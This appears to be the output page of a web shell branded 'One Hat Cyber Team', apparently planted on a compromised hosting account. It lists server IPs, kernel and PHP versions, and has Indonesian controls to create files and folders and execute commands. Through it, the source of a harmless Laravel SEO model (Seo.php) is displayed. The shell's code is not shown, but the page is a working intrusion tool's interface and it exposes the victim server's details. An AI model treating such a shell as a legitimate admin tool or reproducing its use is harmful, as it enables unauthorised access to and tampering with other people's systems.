⚝
One Hat Cyber Team
⚝
Your IP:
66.248.200.6
Server IP:
192.124.249.6
Server:
Linux 56.244.72.148.host.secureserver.net 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
umkm
/
www
/
app
/
Models
/
View File Name :
Seo.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class Seo extends Model { use HasFactory; public $timestamps = false; protected $fillable = ['language_id', 'home_meta_keywords', 'home_meta_description', 'profiles_meta_keywords', 'profiles_meta_description', 'pricing_meta_keywords', 'pricing_meta_description', 'blogs_meta_keywords', 'blogs_meta_description', 'faqs_meta_keywords', 'faqs_meta_description', 'contact_meta_keywords', 'contact_meta_description', 'login_meta_keywords', 'login_meta_description', 'forget_password_meta_keywords', 'forget_password_meta_description', 'checkout_meta_keywords', 'checkout_meta_description', 'vcard_template_description', 'vcard_template_keywords', 'website_template_description', 'website_template_keywords']; }